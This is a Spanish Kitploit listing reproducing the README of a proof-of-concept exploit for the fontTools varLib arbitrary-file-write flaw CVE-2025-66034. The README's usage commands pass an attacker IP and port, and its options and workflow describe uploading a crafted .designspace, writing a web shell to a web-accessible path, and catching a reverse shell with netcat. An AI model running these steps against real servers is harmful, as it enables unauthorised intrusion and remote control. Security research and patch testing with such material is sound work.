Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
varlib-cve-2025-66034 — Exploit de prueba de concepto para CVE-2025-66034 en el pipeline de generación de fuentes variables de fontTools. Un archivo .designspace manipulado permite controlar la ruta de salida, lo que habilita la escritura arbitraria de archivos. El script automatiza la creación del payload, la generación de fuentes y la subida para demostrar el problema. | Kitploit
Herramientas/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Ver Repositorio
2hace 5 mesesAún no revisado

Exploit de prueba de concepto para CVE-2025-66034 en el pipeline de generación de fuentes variables de fontTools. Un archivo .designspace manipulado permite controlar la ruta de salida, lo que habilita la escritura arbitraria de archivos. El script automatiza la creación del payload, la generación de fuentes y la subida para demostrar el problema.

Compartir

Exploit de fontTools varLib CVE-2025-66034

cve component vulnerability vector impact language dependency license

Este repositorio no introduce una nueva vulnerabilidad.

Este es un exploit de prueba de concepto para CVE-2025-66034 que afecta al pipeline de generación de fuentes variables varLib de fontTools.

La vulnerabilidad permite a los atacantes controlar el nombre del archivo de salida dentro de un archivo .designspace manipulado. Cuando un servicio vulnerable de generación de fuentes lo procesa, esto puede provocar la escritura arbitraria de archivos en el sistema de archivos del servidor.

El script varlib_cve_2025_66034.py automatiza la creación del payload, la generación de fuentes, la subida y el disparo opcional de la shell.


Características

  • Creación automática de fuentes maestras compatibles usando fontTools
  • Generación de nombres de archivo de shell aleatorios
  • Ruta de destino y endpoint de subida personalizables
  • Listener automático de nc
  • No se requiere preparación manual de fuentes

Requisitos

Python 3.9+

Instalar dependencias:

root@kitploit:~
pip install fonttools requests

Netcat es necesario para el listener:


Uso

Si tu objetivo es un laboratorio autoalojado que se ejecuta en mysite.com, y la ruta de subida, la ruta de escritura en el sistema de archivos y la ruta de disparo accesible por web coinciden con los valores predeterminados del script, puedes ejecutarlo directamente.

Uso básico:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

Es muy probable que el objetivo utilice URLs o rutas de sistema de archivos diferentes; sobrescribe los valores predeterminados con las opciones disponibles a continuación, como --url, --path y --trigger, o modifica el script manualmente.

Nota: los nombres de los campos del formulario de subida multipart pueden variar según el entorno. Si el objetivo no usa los mismos nombres de campo que el script, ajústalos en la sección files antes de ejecutar el exploit.

Opciones

Ejemplo con opciones personalizadas:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

Flujo de trabajo del exploit

  1. Generar fuentes maestras compatibles
  2. Crear un archivo .designspace malicioso
  3. Subir el payload mediante POST multipart
  4. Escribir un archivo arbitrario en el servidor
  5. Activar el payload mediante una petición HTTP

Créditos / Agradecimientos

Un agradecimiento especial y respeto para:

  • Los mantenedores y colaboradores del proyecto fontTools por su trabajo en la biblioteca de código abierto fontTools.
  • Los investigadores de seguridad que descubrieron y divulgaron responsablemente CVE-2025-66034.
  • La comunidad de seguridad de código abierto por documentar y analizar vulnerabilidades que ayudan a mejorar la seguridad del software.

Esta prueba de concepto se proporciona con fines educativos y de investigación para ayudar a comprender la vulnerabilidad y su impacto.


Descargo de responsabilidad

Este código se proporciona solo con fines educativos y de investigación.

No utilices este exploit contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.

El autor no es responsable del mal uso o de los daños causados por este software.


Referencias

  • Detalles del CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • Aviso de GitHub: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • Proyecto fontTools: https://github.com/fonttools/fonttools
  • Documentación de fontTools: https://fonttools.readthedocs.io/
Descargar herramienta
ArgumentoDescripción
--ipIP del listener del atacante
--portPuerto del listener
--pathRuta del sistema de archivos de destino donde se escribirá el archivo (debe ser accesible por web para poder activar una web shell)
--urlEndpoint de subida, el formulario puede variar
--triggerURL base utilizada para activar el payload escrito después de la subida
--no-listenDesactiva el listener automático de netcat